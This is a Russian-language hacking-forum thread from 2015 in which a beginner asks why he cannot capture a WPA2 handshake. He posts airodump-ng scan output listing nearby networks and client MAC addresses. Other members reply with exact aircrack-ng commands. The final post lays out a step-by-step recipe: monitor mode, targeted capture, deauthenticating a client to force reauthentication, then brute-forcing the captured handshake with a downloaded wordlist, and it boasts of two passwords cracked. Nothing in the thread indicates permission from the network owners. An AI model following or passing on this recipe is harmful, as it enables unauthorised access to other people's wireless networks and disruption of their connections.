Проблемы с перехватом хендшейка

Discussion in 'Песочница' started by Василий-Шишкин, 11 May 2015.

  1. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    ) это вы уже писали, проблема в том, что я не знаю где это, так лучше, спасибо
    А понял, где это под моей темой, в списке всех тем, сначала понял в моей теме под ней, поэтому не мог найти
     
    #21 Василий-Шишкин, 12 May 2015
    Last edited: 12 May 2015
  2. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    В той статье опять же сразу есть клиенты а у меня их нет!
    Code:
     CH 12 ][ Elapsed: 1 hour 10 min ][ 2015-05-12 09:07 ][ fixed channel mon0: -1   
       
     BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH E
       
     20:CF:30:D6:46:DB  -40  58  166  0  0  12  54e  WPA2 CCMP  PSK  J
       
     BSSID  STATION  PWR  Rate  Lost  Frames  Probe   
       
    
    Видите, там "Data" написано 0.
    Нет ни кого. И так на всех.
     
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    тогда ты не перехватишь
     
  4. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    в смысле почему? Я одновремено пытался отключить клиента, который раннее подключался к ней
     
  5. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Code:
    CH  4 ][ Elapsed: 1 min ][ 2015-05-12 09:13 ][ display sta only 
     
    BSSID  STATION  PWR  Rate  Lost  Frames  Probe 
     
    ------ (not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  13 
    (not associated)  00:C0:CA:81:EC:0E  -47  0 - 1  0  14 
    (not associated)  A4:EE:57:6F:C7:A3  -55  0 - 1  42  37 
    (not associated)  A0:EC:80:FC:5C:06  -57  0 - 1  0  6 
    (not associated)  EC:0E:C4:22:7D:BF  -59  0 - 1  0  2 
    (not associated)  40:30:04:93:26:14  -59  0 - 1  0  4 
    (not associated)  18:67:B0:7D:29:B3  -61  0 - 1  49  21  ������,Zyubin,wi-fi 
    (not associated)  88:9F:FA:04:E4:D7  -61  0 - 1  0  4  1q2w3e4r 
    (not associated)  E0:CB:EE:3F:8E:87  -61  0 - 1  0  1 
    (not associated)  9C:8E:99:08:14:34  -51  0 - 1  18  89  UI.RU-IU.RU 
    (not associated)  A8:96:8A:8F:01:FA  -65  0 - 1  0  4 
    (not associated)  60:21:C0:80:A1:D4  -65  0 - 1  0  2 
    (not associated)  18:67:B0:81:6D:05  -65  0 - 1  0  3  514KZ 
    (not associated)  74:E1:B6:C3:88:82  -67  0 - 1  0  2  DLink 
    (not associated)  68:17:29:EE:40:B7  -67  0 - 1  0  1 
    (not associated)  CC:3A:61:EA:D6:51  -67  0 - 1  0  5 
    (not associated)  CA:48:E9:2F:54:0B  -67  0 - 1  0  2 
    (not associated)  74:F0:6D:75:72:74  -67  0 - 1  0  2 
    (not associated)  00:26:82:65:8F:91  -65  0 - 1  30  24 
    (not associated)  A4:C3:61:58:30:58  -67  0 - 1  0  3 
    (not associated)  DC:85:DE:25:8B:1A  -67  0 - 1  0  2  ASUS 
    (not associated)  40:2C:F4:02:19:EE  -67  0 - 1  0  1 
    (not associated)  44:6D:57:87:BF:7B  -67  0 - 1  0  7 
    (not associated)  50:B7:C3:DE:3A:EB  -69  0 - 1  0  7 
    (not associated)  9C:A9:E4:B8:64:C4  -69  0 - 1  0  1 
    (not associated)  20:02:AF:30:82:4C  -69  0 - 1  0  7 
    (not associated)  48:5D:60:88:2C:68  -69  0 - 1  0  1 
    (not associated)  34:23:BA:4C:D8:94  -69  0 - 1  0  9 
    (not associated)  74:F0:6D:92:2C:D2  -69  0 - 1  0  1 
    (not associated)  8C:FA:BA:B8:44:9B  -69  0 - 1  0  2
    
    Первый самый, он был раньше подключен, только вот инетресно почему теперь мой ноутбук не может определить, к чему он подключен, не сидит он же без инета(клиент)
     
  6. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    что -то ты не то делаешь
     
  7. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Хорошее замечание, для этой цели я написал свой вопрос.
     
  8. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    пиши команды которые выполняешь , то что я вижу ты никак не поймаешь его
     
  9. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Самое самое начало. Там вроде я все описал, или вам надо что-то еще . Скажите, какие команды вам ещё нужны, по моему то что я описал то я и делал.
     
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    То что я вижу, этим ты хешики не поймаешь.
     
  11. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Это вывод команды: airodump-ng mon0.
    Не я же диктую линексу что выводить, что я увидел, то я и написал сюда.
     
  12. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Я по логам вижу. Я ещё раз повторю. Такой командой ВЫ хандшайк не поймайте.
     
  13. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    А как надо? Есть какой-нибудь может другой способ.
     
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    я в статье описал метод ловли
     
  15. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    airodump-ng --bssid CC:5D:4E:DA:11:C8 -c1 -w hachthis mon0 эта команда верная

    aireplay-ng --deauth 5 -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0 эта нет
    Я не увидел где у тебя там клиент есть. ткни меня носов в это.
     
  16. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    В смысле? aireplay-ng программа для отключенния клиентов от сети, а airodump-ng для мониторинга (сканирования) роутеров. И они оба правельны ( на мой взгляд, потому что не я их придумал, взял с этого же форума"Античат").
     
  17. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    aireplay-ng --deauth 5 -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0 -- какой результат работы этой команды ? Возможно когда писали мануалы был бак трак
     
  18. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Выше уже описывал:
     
  19. V777

    V777 Elder - Старейшина

    Joined:
    12 May 2015
    Messages:
    1,326
    Likes Received:
    3,181
    Reputations:
    24
    Советую Вам wifislax для начала, там намного проще и больше (шансов поймать хендшейк ) утилит. По моему для вардрайвинга софта проще нет и переведен на русский . http://forum.antichat.ru/threads/423233/
     
  20. Destroy525

    Destroy525 New Member

    Joined:
    8 May 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Попробую передать мой опыт, так скажем первые шаги...
    Я делал по такой инструкции:
    1. airmon-ng start wlan0
    2. airodump-ng mon0
    3. airodump-ng -w (name of target) -c (channel) --bssid (target mac address) mon0
    4. aireplay-ng wlan0 --deauth 5 -a (mac bssid) -c (mac client) mon0
    после этой команды клиент должен отвалится и заново аутонтифицироваться.
    после последней команды мониторим ситуацию с хендшейком. я с первой попытки выудил 2 хендшейка подряд. позже наудивление сбрутил пассы один за 10 мин, второй за 2.5 часа работы со штатным словарем с инета, скорость перебора составила в районе 11000 паролей в сек. Все работает, нужно понимачть что делаешь. А не просто копировать.
    честно говоря не помню откуда взял словарик но он меня порадовал.
     
    #40 Destroy525, 13 May 2015
    Last edited: 13 May 2015